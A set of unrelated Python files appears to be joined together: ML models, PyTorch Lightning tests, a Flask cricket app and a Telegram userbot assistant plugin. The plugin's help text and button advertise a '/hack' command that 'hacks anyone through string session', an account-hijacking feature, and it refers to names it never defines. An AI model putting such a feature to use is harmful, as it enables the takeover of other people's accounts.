# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. |
from orchespy import device, transfer_array
from orchespy.devicetype import Host, VE
import numpy
import nlcpy
@device(Host)
def sum_host(x, y):
return x + y
@device(VE)
def sum_dev(x, y):
return x + y
@device(Host, numpy_module_arg='xp')
def create_host(size, xp):
return xp.random.rand(*size)
@device(VE, numpy_module_arg='xp')
def create_dev(size, xp):
return xp.random.rand(*size)
size = (1000, 500, 500)
x1 = create_host(size)
x2 = create_dev(size)
x3 = create_dev(size)
print(type(x1), type(x2), type(x3))
y1 = sum_dev(x1, x2)
z1d = sum_dev(y1, x3)
y2 = sum_host(x1, x2)
z2h = sum_host(y2, x3)
z1h = transfer_array(z1d, Host())
diffh = z2h - z1h
print('Norm on host:', numpy.linalg.norm(diffh))
z2d = transfer_array(z2h, VE)
diffd = z2d - z1d
print('Norm on device:', nlcpy.linalg.norm(diffd))
|
# plot an histogram of binomial distributed numbers
import numpy
import matplotlib.pyplot as plt
randNumbers = numpy.random.binomial(1000, .75, 5000)
plt.hist(randNumbers,100)
plt.title("Histogram of randomly choosen binomial numbers")
plt.xlabel("range")
plt.show() |
from torch import nn
from Model.Block import ResidualBlock, list_to_sequential
from Model.Block import UpsamlingBlock
import numpy as np
class Generator(nn.Module):
def __init__(self, in_channels=3, num_residual_blocks=16):
super(Generator, self).__init__() # (in, out)
num_upsampling_blocks = 2
out_channels = 64
self.input_block = nn.Sequential(
nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(9, 9), # ( 3, 64)
stride=1, padding=4, bias=False),
nn.PReLU()
)
self.residual_blocks = list_to_sequential(
[ResidualBlock(in_channels=out_channels, out_channels=out_channels) # (64, 64)
for _ in range(num_residual_blocks)]
)
self.intermediate_block = nn.Sequential(
nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), # (64, 64)
stride=1, padding=1, bias=False),
nn.BatchNorm2d(num_features=out_channels)
) # for connecting residual blocks with upsampling blocks!
self.upsampling_blocks = list_to_sequential(
[UpsamlingBlock(in_channels=out_channels, # (64, 64 * num_upsampling_blocks ^ 2)
scaling_factor=num_upsampling_blocks)
for _ in range(num_upsampling_blocks)]
)
self.output_block = nn.Sequential(
nn.Conv2d(in_channels=out_channels, out_channels=in_channels, kernel_size=(9, 9),
stride=1, padding=4, bias=False),
# we might add extra non-linear activation here!
)
self.short_cut = nn.Sequential()
def forward(self, x):
identity = self.input_block(x)
out = self.residual_blocks(identity)
out = self.short_cut(identity) + self.intermediate_block(out)
out = self.upsampling_blocks(out)
out = self.output_block(out)
return out
|
from InstruccionesPL.TablaSimbolosPL.InstruccionPL import InstruccionPL
class CallFun(InstruccionPL):
def __init__(self, id , op,tipo, strGram, linea, columna):
InstruccionPL.__init__(self, tipo, linea, columna, strGram)
self.id = id
self.op = op
def ejecutar(self, tabla, arbol):
super().ejecutar(tabla,arbol)
#ejecucion de una funcion
def traducir(self, tabla, arbol):
print('trduccion') |
import os
import platform
import pytest
import torch
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import Callback
from pytorch_lightning.plugins import DDPShardedPlugin, DDPSpawnShardedPlugin
from pytorch_lightning.utilities import _APEX_AVAILABLE, _FAIRSCALE_AVAILABLE, _NATIVE_AMP_AVAILABLE
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from tests.helpers.boring_model import BoringModel
@pytest.mark.parametrize(["accelerator"], [("ddp_sharded", ), ("ddp_sharded_spawn", )])
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_sharded_ddp_choice(tmpdir, accelerator):
"""
Test to ensure that plugin is correctly chosen
"""
class CB(Callback):
def on_fit_start(self, trainer, pl_module):
if accelerator == 'ddp_sharded':
assert isinstance(trainer.accelerator_backend.training_type_plugin, DDPShardedPlugin)
elif accelerator == 'ddp_sharded_spawn':
assert isinstance(trainer.accelerator_backend.training_type_plugin, DDPSpawnShardedPlugin)
raise SystemExit()
model = BoringModel()
trainer = Trainer(
fast_dev_run=True,
accelerator=accelerator,
callbacks=[CB()],
)
with pytest.raises(SystemExit):
trainer.fit(model)
@pytest.mark.skipif(not _APEX_AVAILABLE, reason="test requires apex")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_invalid_apex_sharded(tmpdir):
"""
Test to ensure that we raise an error when we try to use apex and sharded
"""
model = BoringModel()
with pytest.raises(MisconfigurationException, match='Sharded Plugin is not supported with Apex AMP'):
trainer = Trainer(
fast_dev_run=True,
accelerator='ddp_sharded_spawn',
precision=16,
amp_backend='apex',
)
trainer.fit(model)
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="test requires GPU machine")
@pytest.mark.parametrize(["accelerator"], [("ddp_sharded", ), ("ddp_sharded_spawn", )])
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
@pytest.mark.skipif(not _NATIVE_AMP_AVAILABLE, reason="Requires native AMP")
def test_ddp_choice_sharded_amp(tmpdir, accelerator):
"""
Test to ensure that plugin native amp plugin is correctly chosen when using sharded
"""
class CB(Callback):
def on_fit_start(self, trainer, pl_module):
if accelerator == 'ddp_sharded':
assert isinstance(trainer.accelerator_backend.training_type_plugin, DDPShardedPlugin)
elif accelerator == 'ddp_sharded_spawn':
assert isinstance(trainer.accelerator_backend.training_type_plugin, DDPSpawnShardedPlugin)
raise SystemExit()
model = BoringModel()
trainer = Trainer(
fast_dev_run=True,
gpus=1,
precision=16,
accelerator=accelerator,
callbacks=[CB()],
)
with pytest.raises(SystemExit):
trainer.fit(model)
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_checkpoint_cpu(tmpdir):
"""
Test to ensure that checkpoint is saved correctly
"""
model = BoringModel()
trainer = Trainer(
accelerator='ddp_sharded_spawn',
num_processes=2,
fast_dev_run=True,
)
trainer.fit(model)
checkpoint_path = os.path.join(tmpdir, 'model.pt')
trainer.save_checkpoint(checkpoint_path)
saved_model = BoringModel.load_from_checkpoint(checkpoint_path)
# Assert model parameters are identical after loading
for ddp_param, shard_param in zip(model.parameters(), saved_model.parameters()):
assert torch.equal(ddp_param.to("cpu"), shard_param)
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_checkpoint_multi_gpu(tmpdir):
"""
Test to ensure that checkpoint is saved correctly when using multiple GPUs
"""
model = BoringModel()
trainer = Trainer(
gpus=2,
accelerator='ddp_sharded_spawn',
fast_dev_run=True,
)
trainer.fit(model)
checkpoint_path = os.path.join(tmpdir, 'model.pt')
trainer.save_checkpoint(checkpoint_path)
saved_model = BoringModel.load_from_checkpoint(checkpoint_path)
# Assert model parameters are identical after loading
for ddp_param, shard_param in zip(model.parameters(), saved_model.parameters()):
assert torch.equal(ddp_param.to("cpu"), shard_param)
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_finetune(tmpdir):
"""
Test to ensure that we can save and restart training (simulate fine-tuning)
"""
model = BoringModel()
trainer = Trainer(
gpus=2,
accelerator='ddp_sharded_spawn',
fast_dev_run=True,
)
trainer.fit(model)
checkpoint_path = os.path.join(tmpdir, 'model.pt')
trainer.save_checkpoint(checkpoint_path)
saved_model = BoringModel.load_from_checkpoint(checkpoint_path)
trainer = Trainer(fast_dev_run=True, )
trainer.fit(saved_model)
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_resume_from_checkpoint(tmpdir):
"""
Test to ensure that resuming from checkpoint works
"""
model = BoringModel()
trainer = Trainer(
accelerator='ddp_sharded_spawn',
num_processes=2,
fast_dev_run=True,
)
trainer.fit(model)
checkpoint_path = os.path.join(tmpdir, 'model.pt')
trainer.save_checkpoint(checkpoint_path)
model = BoringModel()
trainer = Trainer(
accelerator='ddp_sharded_spawn', num_processes=2, fast_dev_run=True, resume_from_checkpoint=checkpoint_path,
)
trainer.fit(model)
@pytest.mark.skip(reason="Not a critical test, skip till drone CI performance improves.")
@pytest.mark.skip(reason="Currently unsupported restarting training on different number of devices.")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_resume_from_checkpoint_downsize_gpus(tmpdir):
"""
Test to ensure that resuming from checkpoint works when downsizing number of GPUS
"""
model = BoringModel()
trainer = Trainer(
accelerator='ddp_sharded_spawn',
fast_dev_run=True,
gpus=2,
)
trainer.fit(model)
checkpoint_path = os.path.join(tmpdir, 'model.pt')
trainer.save_checkpoint(checkpoint_path)
model = BoringModel()
trainer = Trainer(
accelerator='ddp_sharded_spawn', fast_dev_run=True, gpus=1, resume_from_checkpoint=checkpoint_path,
)
trainer.fit(model)
@pytest.mark.skipif(not torch.cuda.is_available(), reason="requires GPU machine")
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_resume_from_checkpoint_gpu_to_cpu(tmpdir):
"""
Test to ensure that resuming from checkpoint works when going from GPUs- > CPU
"""
model = BoringModel()
trainer = Trainer(
accelerator='ddp_sharded_spawn',
gpus=1,
fast_dev_run=True,
)
trainer.fit(model)
checkpoint_path = os.path.join(tmpdir, 'model.pt')
trainer.save_checkpoint(checkpoint_path)
model = BoringModel()
trainer = Trainer(
accelerator='ddp_sharded_spawn', num_processes=2, fast_dev_run=True, resume_from_checkpoint=checkpoint_path,
)
trainer.fit(model)
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
@pytest.mark.skipif(
not os.getenv("PL_RUNNING_SPECIAL_TESTS", '0') == '1', reason="test should be run outside of pytest"
)
def test_ddp_sharded_plugin_test(tmpdir):
"""
Test to ensure we can use test without fit
"""
model = BoringModel()
trainer = Trainer(
accelerator='ddp_sharded_spawn',
num_processes=2,
fast_dev_run=True,
)
trainer.test(model)
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(platform.system() == "Windows", reason="Distributed training is not supported on Windows")
@pytest.mark.skipif(not _FAIRSCALE_AVAILABLE, reason="Fairscale is not available")
def test_ddp_sharded_plugin_test_multigpu(tmpdir):
"""
Test to ensure we can use test without fit
"""
model = BoringModel()
trainer = Trainer(
accelerator='ddp_sharded_spawn',
gpus=2,
fast_dev_run=True,
)
trainer.test(model)
|
allSyms = {}
fn = None
for line in file('funcdb', 'r').read().strip().split('\n'):
if not line:
continue
if line[0] != '\t':
fn = line
continue
sym, encoding = line[1:].split(' = ', 1)
if not encoding.startswith('~f{'):
continue
encoding = encoding[3:-1]
if sym not in allSyms or len(allSyms[sym][0]) > len(fn):
allSyms[sym] = fn, encoding
with file('funcdb2', 'w') as fp:
for sym, (_, encoding) in sorted(allSyms.items(), key=lambda x: x[0]):
print >>fp, '%s=%s' % (sym, encoding)
|
from scoring_engine.engine.basic_check import CHECKS_BIN_PATH
from tests.scoring_engine.checks.check_test import CheckTest
class TestElasticsearchCheck(CheckTest):
check_name = 'ElasticsearchCheck'
properties = {
'index': 'events',
'doc_type': 'message'
}
cmd = CHECKS_BIN_PATH + "/elasticsearch_check '127.0.0.1' 1234 'events' 'message'"
|
import asyncio
import re
from telethon import Button, custom, events
from telethon.tl.functions.users import GetFullUserRequest
from userbot import bot
from userbot.plugins.sql_helper.blacklist_assistant import (
add_nibba_in_db,
is_he_added,
removenibba,
)
from userbot.plugins.sql_helper.botusers import add_me_in_db, his_userid
from userbot.plugins.sql_helper.idadder import (
add_usersid_in_db,
already_added,
get_all_users,
)
@firebot.on(events.NewMessage(pattern="^/start"))
async def start(event):
codetechbot = await firebot.get_me()
bot_id = codetechbot.first_name
codetechbot.username
codetechbot.username
replied_user = await event.client(GetFullUserRequest(event.sender_id))
firstname = replied_user.user.first_name
vent = event.chat_id
starttext = f"Hello, {firstname} ! Nice To Meet You, Well I Am {bot_id}, An Powerfull Assistant Bot. \n\nMy [➤ Master](tg://user?id={bot.uid}) \nI Can Deliver Message To My Master Using This Bot. \n\nIf You Want Your Own Assistant You Can Deploy From Button Below. \n\nPowered By [『FIRE-X』](https://t.me/Official_FIREX)"
if event.sender_id == bot.uid:
await firebot.send_message(
vent,
message=f"Hi Sir/Miss, It's Me {bot_id}, Your Assistant ! \nHow Can I help U?",
buttons=[
[
Button.url(
"Add Me to Group 👥", "t.me/{bot_username}?startgroup=true"
)
],
[
Button.url(" Support ", "https://t.me/FirexSupport"),
Button.url(" Updates ", "https://t.me/FIREXUB"),
],
[custom.Button.inline("Settings", data="osg")],
[custom.Button.inline("Hack", data="hack")],
],
)
else:
if already_added(event.sender_id):
pass
elif not already_added(event.sender_id):
add_usersid_in_db(event.sender_id)
await firebot.send_message(
event.chat_id,
message=starttext,
link_preview=False,
buttons=[
[
custom.Button.inline(" Rules ", data="rules"),
custom.Button.inline(" Close ", data="close"),
],
[custom.Button.inline("Contact", data="contact_")],
[custom.Button.inline("Deploy Your Fire-X", data="deploy")],
],
)
# Data's
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"deploy")))
async def help(event):
await event.delete()
if event.query.user_id is not bot.uid:
await firebot.send_message(
event.chat_id,
message="You Can Deploy Fire-X In Heroku By Following Steps Bellow, You Can See Some Quick Guides On Support Channel Or On Your Own Assistant Bot. \nThank You For Contacting Me.",
link_preview=False,
buttons=[
[custom.Button.inline("Deploy your Fire-X", data="fire")],
[Button.url("Help Me ❓", "https://t.me/firexSupport")],
[Button.url("Github Repo ❓", "github.com/TeamEviral/FIREXUSERBOT")],
],
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"fire")))
async def help(event):
await event.delete()
if event.query.user_id is not bot.uid:
await firebot.send_message(
event.chat_id,
message="🔰 https://dashboard.heroku.com/new?button-url=https%3A%2F%2Fgithub.com%2FTeameviral%2FFIREXUSERBOT&template=https%3A%2F%2Fgithub.com%2FTeamEviral%2FFIREX",
buttons=[
[custom.Button.inline("Back", data="osg")],
],
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"rules")))
async def help(event):
await event.delete()
if event.query.user_id is not bot.uid:
await firebot.send_message(
event.chat_id,
message="🔰Rᴇᴀᴅ Tʜᴇ Rᴜʟᴇꜱ Tᴏᴏ🔰\n\n🔹 Dᴏɴ'ᴛ Sᴩᴀᴍ\n🔹 ᴛᴀʟᴋ Fʀɪᴇɴᴅʟy\n🔹 Dᴏɴ'ᴛ Bᴇ Rᴜᴅᴇ\n🔹 Sᴇɴᴅ Uʀ Mᴇꜱꜱᴀɢᴇꜱ Hᴇʀᴇ\n🔹 Nᴏ Pᴏʀɴᴏɢʀᴀᴘʜʏ\n🔹 Dᴏɴ'ᴛ Wʀɪᴛᴇ Bᴀᴅ Wᴏʀᴅs.\n\nWʜᴇɴ I Gᴇᴛ Fʀᴇᴇ Tɪᴍᴇ , I'ʟʟ Rᴇᴩʟy U 💯✅",
buttons=[
[custom.Button.inline("Back", data="osg")],
],
)
@firebot.on(events.callbackquery.CallbackQuery(data=re.compile(b"contact_")))
async def help(event):
await event.delete()
if event.query.user_id == bot.uid:
await event.answer("This Is Not For U My Master", cache_time=0, alert=True)
else:
await firebot.send_message(
event.chat_id,
message="🔰 Sᴇɴᴅ Uʀ Mᴇꜱꜱᴀɢᴇꜱ Hᴇʀᴇ �",
buttons=[
[custom.Button.inline("Back", data="osg")],
],
)
# Bot Permit.
@firebot.on(events.NewMessage(func=lambda e: e.is_private))
async def all_messages_catcher(event):
if is_he_added(event.sender_id):
return
if event.raw_text.startswith("/"):
pass
elif event.sender_id == bot.uid:
return
else:
await event.get_sender()
event.chat_id
sed = await event.forward_to(bot.uid)
add_me_in_db(sed.id, event.sender_id, event.id)
@firebot.on(events.NewMessage(func=lambda e: e.is_private))
async def sed(event):
msg = await event.get_reply_message()
msg.id
msg_s = event.raw_text
user_id, reply_message_id = his_userid(msg.id)
if event.sender_id == bot.uid:
if event.raw_text.startswith("/"):
pass
else:
await firebot.send_message(user_id, msg_s)
# broadcast
@firebot.on(
events.NewMessage(
pattern="^/broadcast ?(.*)", func=lambda e: e.sender_id == bot.uid
)
)
async def sedlyfsir(event):
msgtobroadcast = event.pattern_match.group(1)
userstobc = get_all_users()
error_count = 0
sent_count = 0
for starkcast in userstobc:
try:
sent_count += 1
await firebot.send_message(int(starkcast.chat_id), msgtobroadcast)
await asyncio.sleep(0.2)
except Exception as e:
try:
logger.info(f"Error : {error_count}\nError : {e} \nUsers : {chat_id}")
except:
pass
await firebot.send_message(
event.chat_id,
f"Broadcast Done in {sent_count} Group/Users and I got {error_count} Error and Total Number Was {len(userstobc)}",
)
@firebot.on(
events.NewMessage(pattern="^/stats ?(.*)", func=lambda e: e.sender_id == bot.uid)
)
async def starkisnoob(event):
starkisnoob = get_all_users()
await event.reply(
f"**Stats Of Your Bot** \nTotal Users In Bot => {len(starkisnoob)}"
)
@firebot.on(events.NewMessage(pattern="^/help", func=lambda e: e.sender_id == bot.uid))
async def starkislub(event):
grabonx = "Hello Here Are Some Commands \n➤ /start - Check if I am Alive \n➤ /ping - Pong! \n➤ /tr <lang-code> \n➤ /hack- hack anyone through string session \n➤ \eval - run an assync code \n➤ /broadcast - Sends Message To all Users In Bot \n➤ /id - Shows ID of User And Media. \n➤ /addnote - Add Note \n➤ /notes - Shows Notes \n➤ /rmnote - Remove Note \n➤ /alive - Am I Alive? \n➤ /bun - Works In Group , Bans A User. \n➤ /unbun - Unbans A User in Group \n➤ /prumote - Promotes A User \n➤ /demute - Demotes A User \n➤ /pin - Pins A Message \n➤ /stats - Shows Total Users In Bot"
await event.reply(grabonx)
@firebot.on(
events.NewMessage(pattern="^/block ?(.*)", func=lambda e: e.sender_id == bot.uid)
)
async def starkisnoob(event):
if event.sender_id == bot.uid:
msg = await event.get_reply_message()
msg.id
event.raw_text
user_id, reply_message_id = his_userid(msg.id)
if is_he_added(user_id):
await event.reply("Already Blacklisted")
elif not is_he_added(user_id):
add_nibba_in_db(user_id)
await event.reply("Blacklisted This Dumb Person")
await firebot.send_message(
user_id, "You Have Been Blacklisted And You Can't Message My Master Now."
)
@firebot.on(
events.NewMessage(pattern="^/unblock ?(.*)", func=lambda e: e.sender_id == bot.uid)
)
async def starkisnoob(event):
if event.sender_id == bot.uid:
msg = await event.get_reply_message()
msg.id
event.raw_text
user_id, reply_message_id = his_userid(msg.id)
if not is_he_added(user_id):
await event.reply("Not Even. Blacklisted 🤦🚶")
elif is_he_added(user_id):
removenibba(user_id)
await event.reply("DisBlacklisted This Dumb Person")
await firebot.send_message(
user_id, "Congo! You Have Been Unblacklisted By My Master."
)
|
# Copyright 2021 by B. Knueven, D. Mildebrath, C. Muir, J-P Watson, and D.L. Woodruff
# This software is distributed under the 3-clause BSD License.
"""
An example of using amalgamator and solving directly the EF
To execute this:
python farmer_ama.py --num-scens=10 --crops-multiplier=3 --farmer-with-integer
WARNING:
num-scens must be specified !
"""
import mpisppy.utils.amalgamator as amalgamator
def main():
solution_files = {"first_stage_solution":"farmer_first_stage.csv",
}
ama_options = {"EF-2stage": True, # We are solving directly the EF
"write_solution":solution_files}
#The module can be a local file
ama = amalgamator.from_module("afarmer", ama_options)
ama.run()
print("first_stage_solution=", ama.first_stage_solution)
print("inner bound=", ama.best_inner_bound)
print("outer bound=", ama.best_outer_bound)
if __name__ == "__main__":
main() |
# 使用Tensorflow的CNN网络识别MNIST手写数字
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import os
from tensorflow.examples.tutorials.mnist import input_data
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
# Hyper Parameters
BATCH_SIZE = 128
LR_BASE = 0.0002
LR_DECAY = 0.99
TRAIN_STEP = 6000
mnist = input_data.read_data_sets(
"E:/Test/Tensorflow/MNIST_data", one_hot=True)
# plt.imshow(mnist.train.images[123].reshape(28, 28), cmap='gray')
# plt.show()
w1 = tf.Variable(tf.truncated_normal([5, 5, 1, 32], stddev=1, seed=1))
w2 = tf.Variable(tf.truncated_normal([5, 5, 32, 64], stddev=1, seed=1))
b1 = tf.Variable(tf.random_normal([32], stddev=1, seed=1))
b2 = tf.Variable(tf.random_normal([64], stddev=1, seed=1))
w_fc1 = tf.Variable(tf.random_normal([7 * 7 * 64, 1024], stddev=1, seed=1))
w_fc2 = tf.Variable(tf.random_normal([1024, 10], stddev=1, seed=1))
b_fc1 = tf.Variable(tf.random_normal([1024], stddev=1, seed=1))
b_fc2 = tf.Variable(tf.random_normal([10], stddev=1, seed=1))
x = tf.placeholder(tf.float32, shape=(None, 28, 28, 1), name='x-input')
y_ = tf.placeholder(tf.float32, shape=(None, 10), name='y-input')
conv1 = tf.nn.relu(tf.nn.conv2d(
x, w1, strides=[1, 1, 1, 1], padding='SAME')+b1)
pool1 = tf.nn.max_pool2d(conv1, ksize=[1, 2, 2, 1], strides=[
1, 2, 2, 1], padding='SAME')
conv2 = tf.nn.relu(tf.nn.conv2d(
pool1, w2, strides=[1, 1, 1, 1], padding='SAME') + b2)
pool2 = tf.nn.max_pool2d(conv2, ksize=[1, 2, 2, 1], strides=[
1, 2, 2, 1], padding='SAME')
pool2 = tf.reshape(pool2, [-1, 7*7*64])
fc1 = tf.nn.relu(tf.matmul(pool2, w_fc1) + b_fc1)
y = tf.matmul(fc1, w_fc2) + b_fc2
cross_entropy = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=y, labels=tf.argmax(y_, 1)))
train = tf.train.AdamOptimizer(LR_BASE).minimize(cross_entropy)
dataset_size = mnist.train.num_examples
X = mnist.train.images.reshape([-1, 28, 28, 1])
Y = mnist.train.labels
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(TRAIN_STEP):
start = (i*BATCH_SIZE) % dataset_size
end = min(start+BATCH_SIZE, dataset_size)
sess.run(train, feed_dict={x: X[start:end], y_: Y[start:end]})
if i % 100 == 0:
total_loss = sess.run(
cross_entropy, feed_dict={x: X[0:200], y_: Y[0:200]})
print("Step:", i, "Loss:", total_loss)
output = (sess.run(tf.argmax(y, 1), feed_dict={
x: X[0:1000], y_: Y[0:1000]}))
for i in range(5):
print("Label:", output[600+i])
plt.imshow(X[600+i].reshape(28, 28))
plt.show()
right_cnt = 0
for i in range(1000):
if output[i] == np.argmax(Y[i]):
right_cnt += 1
print("Accuracy:", right_cnt/1000)
|
# Nameko relies on eventlet
# You should monkey patch the standard library as early as possible to avoid
# importing anything before the patch is applied.
# See http://eventlet.net/doc/patching.html#monkeypatching-the-standard-library
import eventlet
eventlet.monkey_patch()
import logging
logger = logging.getLogger(__name__)
import random
from nameko.rpc import rpc_proxy
from nameko.runners import ServiceRunner
from nameko.timer import timer
class RpcClient(object):
adder = rpc_proxy('adderservice')
@timer(interval=2)
def add(self):
x = random.randint(0, 10)
y = random.randint(0, 10)
res = self.adder.add(x, y)
logger.info("{} + {} = {}".format(x, y, res))
def main():
logging.basicConfig(level=logging.DEBUG)
config = {'AMQP_URI': 'amqp://guest:guest@localhost:5672/'}
runner = ServiceRunner(config)
runner.add_service(RpcClient)
runner.start()
try:
runner.wait()
except KeyboardInterrupt:
runner.stop()
if __name__ == '__main__':
main()
|
import model
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("command", nargs="?", default="all")
parser.add_argument("text", nargs="*")
args = parser.parse_args()
if args.command == "predict":
text = " ".join(args.text)
score = model.predict(text)
desc = "positive" if score > 0.5 else "negative"
print(f"score is: {score:0.2f} ({desc} sentiment)")
elif args.command == "train":
model.train()
elif args.command == "upload":
model.upload_tokenizer()
model.upload_model()
elif args.command == "download":
model.download_model()
elif args.command == "all":
model.train()
model.upload_tokenizer()
model.upload_model()
else:
raise ValueError(f"unknown command {args.command}")
|
import helper
from helper import Command
def start(args, logfile, errfile):
helper.set_database_host(args)
command = Command("rvm jruby-1.7.8 do bundle exec trinidad --config config/trinidad.yml", False)
return helper.run([command], logfile, errfile, args.troot)
def stop(logfile, errfile):
return helper.stop('trinidad', logfile, errfile)
|
"""
Copyright (c) 2021 Zakru
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from setuptools import setup
from cenerator import __version__ as cen_ver
with open('README.md', 'r') as f:
readme = f.read()
setup(
name='cenerator',
version=cen_ver,
author='Zakru',
url='https://github.com/Zakru/cenerator',
description='A Minecraft data pack creation utility',
long_description=readme,
long_description_content_type='text/markdown',
project_urls={
'Source Code': 'https://github.com/Zakru/cenerator',
'Issue Tracker': 'https://github.com/Zakru/cenerator/issues',
},
packages=['cenerator'],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Topic :: Games/Entertainment',
'Topic :: Software Development :: Libraries',
],
)
|
# Copyright 2020 Varun Verma
#
from flask import Flask, render_template, request, jsonify
from src.app_functions import predict_match_result
from src.app_functions import update_team_assignment
from src.app_functions import current_match_prediction
from src.app_functions import update_match_details, update_final_over_details
from src.app_functions import update_predicted_result
from google.cloud import datastore
app = Flask(__name__)
client = datastore.Client()
@app.route('/')
def root():
return render_template('index.html')
@app.route('/test/')
def localTest():
return render_template('test.html')
@app.route('/predictMatchResult', methods = ['POST'])
def match_predict_final_over():
input_data = request.json
prediction_result = predict_match_result(input_data)
return jsonify(prediction_result)
@app.route('/currentMatchPrediction', methods = ['POST'])
def currentMatchPrediction():
input_data = request.json
prediction_result = current_match_prediction(input_data)
return jsonify(prediction_result)
@app.route('/test/updateTeamAssignments', methods = ['POST'])
def updateTeamAssignments():
input_data = request.json
update_result = update_team_assignment(input_data)
return jsonify(update_result)
# API To get Player details
@app.route('/players', methods = ['GET'])
def getPlayerNames():
query = client.query(kind="Players")
query.projection = ["player_name"]
players = list(query.fetch())
return jsonify(players)
# API To get Team details
@app.route('/teams', methods = ['GET'])
def getTeamNames():
query = client.query(kind="Teams")
query.projection = ["team_name"]
teams = list(query.fetch())
return jsonify(teams)
# API To get Current Match details
@app.route('/currentMatchPlayers/<team_type>', methods = ['GET'])
def getCurrentMatchPlayers(team_type):
query = client.query(kind="Matches")
query.add_filter("active", "=", True)
match = list(query.fetch())[0]
if team_type == 'bowling':
query = client.query(kind="Teams")
query.add_filter("team_name", "=", match['innings']['innings2']['bowling_team'])
t1players = list(query.fetch())[0]['players']
return jsonify(t1players)
elif team_type == 'batting':
query = client.query(kind="Teams")
query.add_filter("team_name", "=", match['innings']['innings2']['batting_team'])
t2players = list(query.fetch())[0]['players']
return jsonify(t2players)
else:
query = client.query(kind="Teams")
query.add_filter("team_name", "=", match['team1'])
t1players = list(query.fetch())[0]['players']
query = client.query(kind="Teams")
query.add_filter("team_name", "=", match['team2'])
t2players = list(query.fetch())[0]['players']
players = []
players.extend(t1players)
players.extend(t2players)
return jsonify(players)
return jsonify(players)
# API to get Match Details by ID
@app.route('/matchDetails/<match_id>', methods = ['GET'])
def getMatchDetailsByID(match_id):
pk = client.key("Matches", match_id)
md = client.get(pk)
match_details = {
'team1': md['team1'],
'team2': md['team2'],
'fi_bat': md['innings']['innings1']['batting_team'],
'fi_bol': md['innings']['innings1']['bowling_team'],
'si_bat': md['innings']['innings2']['batting_team'],
